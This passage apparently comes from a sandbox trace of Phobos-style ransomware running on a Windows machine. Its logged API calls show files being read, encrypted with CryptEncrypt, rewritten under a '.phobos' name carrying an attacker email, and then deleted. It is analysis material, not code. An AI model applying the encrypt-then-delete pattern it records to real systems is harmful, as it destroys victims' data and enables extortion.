CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0202.718] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0202.718] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0202.718] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0202.719] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32928) returned 1 [0202.719] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0202.719] ReadFile (in: hFile=0x13c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xd3, lpOverlapped=0x0) returned 1 [0202.720] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0202.720] WriteFile (in: hFile=0x100, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0202.720] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32be8) returned 1 [0202.720] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0202.720] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0202.720] CryptDestroyKey (hKey=0xa32be8) returned 1 [0202.720] WriteFile (in: hFile=0x100, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0202.721] CryptDestroyKey (hKey=0xa32928) returned 1 [0202.721] CloseHandle (hObject=0x13c) returned 1 [0202.721] CloseHandle (hObject=0x100) returned 1 [0202.721] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini")) returned 1 [0202.722] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0202.722] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0202.722] GetFileSizeEx (in: hFile=0x100, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=16384) returned 1 [0202.722] CloseHandle (hObject=0x100) returned 1 [0202.722] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")) returned 0x2026 [0202.722] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.722] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0202.722] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0202.722] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0202.722] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0202.723] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32928) returned 1 [0202.723] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0202.723] ReadFile (in: hFile=0x100, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x4000, lpOverlapped=0x0) returned 1 [0202.732] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4010, dwBufLen=0x4010 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4010) returned 1 [0202.732] WriteFile (in: hFile=0x13c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x4010, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x4010, lpOverlapped=0x0) returned 1 [0202.756] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32868) returned 1 [0202.756] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0202.756] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0202.756] CryptDestroyKey (hKey=0xa32868) returned 1 [0202.756] WriteFile (in: hFile=0x13c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0202.756] CryptDestroyKey (hKey=0xa32928) returned 1 [0202.756] CloseHandle (hObject=0x100) returned 1 [0202.756] CloseHandle (hObject=0x13c) returned 1 [0202.756] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")) returned 1 [0202.757] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0202.757] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0202.757] GetFileSizeEx (in: hFile=0x13c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=245760) returned 1 [0202.757] CloseHandle (hObject=0x13c) returned 1 [0202.758] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat")) returned 0x2026 [0202.758] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.758] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0202.758] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0202.758] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0202.758] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0202.758] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32928) returned 1 [0202.758] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0202.758] ReadFile (in: hFile=0x13c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x3c000, lpOverlapped=0x0) returned 1 [0203.024] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3c010, dwBufLen=0x3c010 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3c010) returned 1 [0203.033] WriteFile (in: hFile=0x100, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x3c010, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x3c010, lpOverlapped=0x0) returned 1 [0203.045] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32868) returned 1 [0203.045] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0203.045] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0203.045] CryptDestroyKey (hKey=0xa32868) returned 1 [0203.045] WriteFile (in: hFile=0x100, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0203.046] CryptDestroyKey (hKey=0xa32928) returned 1 [0203.046] CloseHandle (hObject=0x13c) returned 1 [0203.046] CloseHandle (hObject=0x100) returned 1 [0203.046] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat")) returned 1 [0203.048] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0203.048] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\administrative tools\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0203.049] GetFileSizeEx (in: hFile=0x100, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=174) returned 1 [0203.049] CloseHandle (hObject=0x100) returned 1 [0203.049] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\administrative tools\\desktop.ini")) returned 0x26 [0203.049] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\administrative tools\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0203.049] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\administrative tools\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0203.049] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0203.049] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0203.049] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\administrative tools\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0203.050] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32928) returned 1 [0203.050] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0203.050] ReadFile (in: hFile=0x100, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xae, lpOverlapped=0x0) returned 1 [0203.054] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0, dwBufLen=0xb0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0) returned 1 [0203.054] WriteFile (in: hFile=0x13c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xb0, lpOverlapped=0x0) returned 1 [0203.055] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32868) returned 1 [0203.055] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0203.055] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0203.055] CryptDestroyKey (hKey=0xa32868) returned 1 [0203.055] WriteFile (in: hFile=0x13c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0203.055] CryptDestroyKey (hKey=0xa32928) returned 1 [0203.055] CloseHandle (hObject=0x100) returned 1 [0203.055] CloseHandle (hObject=0x13c) returned 1 [0203.055] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\administrative tools\\desktop.ini")) returned 1 [0203.057] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0203.057] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0203.057] GetFileSizeEx (in: hFile=0x13c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=476) returned 1 [0203.057] CloseHandle (hObject=0x13c) returned 1 [0203.058] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\desktop.ini")) returned 0x26 [0203.058] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0203.058] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0203.058] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0203.058] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0203.058] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0203.058] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32928) returned 1 [0203.058] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0203.058] ReadFile (in: hFile=0x13c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1dc, lpOverlapped=0x0) returned 1 [0203.059] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1e0, dwBufLen=0x1e0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1e0) returned 1 [0203.059] WriteFile (in: hFile=0x100, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1e0, lpOverlapped=0x0) returned 1 [0203.060] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32868) returned 1 [0203.060] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0203.060] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0203.060] CryptDestroyKey (hKey=0xa32868) returned 1 [0203.060] WriteFile (in: hFile=0x100, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0203.061] CryptDestroyKey (hKey=0xa32928) returned 1 [0203.061] CloseHandle (hObject=0x13c) returned 1 [0203.061] CloseHandle (hObject=0x100) returned 1 [0203.061] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\desktop.ini")) returned 1 [0203.062] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0203.062] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0203.063] GetFileSizeEx (in: hFile=0x100, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=318) returned 1 [0203.063] CloseHandle (hObject=0x100) returned 1 [0203.063] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\desktop.ini")) returned 0x26 [0203.063] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0203.063] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0203.063] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0203.063] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0203.063] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0203.063] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32928) returned 1 [0203.063] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0203.063] ReadFile (in: hFile=0x100, lpBuffer=0x34b0020, 